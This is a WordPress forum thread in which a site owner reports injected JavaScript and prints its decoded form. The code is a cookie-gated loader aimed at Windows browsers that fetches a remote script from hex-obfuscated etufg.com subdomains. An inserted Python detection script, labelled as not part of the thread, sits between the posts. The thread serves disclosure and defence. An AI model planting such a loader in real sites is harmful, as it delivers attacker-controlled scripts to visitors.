WordPress.org


Javascript Injection Report - based in etufg.com (7 posts)

  1. Lucanos
    Member
    Posted 3 years ago #

    I have just discovered an incident of Javascript Injection on my WordPress-based website. I am running the latest version of WP, and all associated plugins.

    The raw code is inserted just after the opening body tag.

    The raw code is:

    [hack code moderated]

    This can be decoded to:

    <ads><script type="text/javascript">document.write( <script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')};</script> );</script></ads>

    The URL at the end, which seems to be the co-ordinating centre for the attack, is in Hex, and translates to:

    etufg.com

    So, this code seems to be randomly picking one of the following subdomains within that domain:

    • keg.etufg.com
    • kei.etufg.com
    • ken.etufg.com
    • kep.etufg.com
    • kev.etufg.com
    • kex.etufg.com
    • key.etufg.com
    • khi.etufg.com
    • kid.etufg.com
    • kif.etufg.com

    I would not be surprised if further subdomains and/or domains are involved, but this is just the result of my first 40 minutes of investigations.
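
A defender's check for the loader shape described in the post above, as an added example that is not part of the original thread: it decodes runs of `\xNN` escapes and rebuilds the host names a `document.write` loader of this form would request, so they can be searched for in theme files, database dumps and proxy logs. The function names are hypothetical, and the sample input is constructed with the placeholder domain `example.invalid`.

```python
import re

HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")  # 4+ consecutive \xNN escapes
# Matches src="http://'+ARRAY[INDEX]+'<host tail> and captures ARRAY and the tail.
SRC_CONCAT = re.compile(
    r"""src=["']https?://['"]\s*\+\s*(\w+)\[\w+\]\s*\+\s*['"]([^/'"]*)""")


def decode_hex_escapes(text):
    """Replace every \\xNN escape with the character it stands for."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), text)


def hidden_strings(source):
    """Decoded form of each long run of hex escapes found in the source."""
    return [decode_hex_escapes(run) for run in HEX_RUN.findall(source)]


def injected_script_hosts(source):
    """Hosts the loader could request: each array entry joined to the host tail."""
    hosts = set()
    for name, tail in SRC_CONCAT.findall(source):
        array = re.search(r"\b%s\s*=\s*\[([^\]]*)\]" % re.escape(name), source)
        if not array:
            continue
        prefixes = re.findall(r"""["']([^"']+)["']""", array.group(1))
        hosts.update(p + decode_hex_escapes(tail) for p in prefixes)
    return sorted(hosts)


# Constructed sample: same loader shape as in the post, placeholder domain only.
_TAIL = "".join("\\x%02x" % ord(c) for c in "example.invalid")
SAMPLE = ('<body><script>var g=["aaa","bbb"],h=0;document.write(\'<script '
          'src="http://\'+g[h]+\'.' + _TAIL + '/tools/js.js"><\\/script>\')</script>')

if __name__ == "__main__":
    print(hidden_strings(SAMPLE))
    print(injected_script_hosts(SAMPLE))
```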

  2. Samuel B
    moderator
    Posted 3 years ago #

  3. Lucanos
    Member
    Posted 3 years ago #

    Thanks Samuel, I was more posting it here as it seems to be code which either has not been seen before, or has not been written up like this before (I Googled for segments of the code above, but found no matches).

    Just trying to save someone else a bit of time, effort, and hair should more people be affected.

  4. Samuel B
    moderator
    Posted 3 years ago #

    post it at pastebin.com and bring the link back here

  5. Lucanos
    Member
    Posted 3 years ago #

    Pastebin of Hack Code

    Not that I can see the point of putting the code on Pastebin, where it might be found through Googling, but with no links back to this Forum post - creating a dead-end for anyone investigating their problem. But, as you are the Mod, I will defer to your judgement.

  6. Samuel B
    moderator
    Posted 3 years ago #

    the problem putting it here is everyone's virus alert will start going off and I really don't want to deal with all the "omg, the forum's hacked" threads and emails
    :>)

  7. Lucanos
    Member
    Posted 3 years ago #

    But the code had been rendered into HTML and would not execute - so it should not have set off any kind of alerts.

    Any content I share here as a Post is parsed to make it readable - i.e. "<" changes to "& lt;" (space added to prevent parser from doing the same here), etc. which means that, from the view of the browser, it is content rather than structure and will be displayed, but not executed.

    I don't understand your point.

Topic Closed

This topic has been closed to new replies.
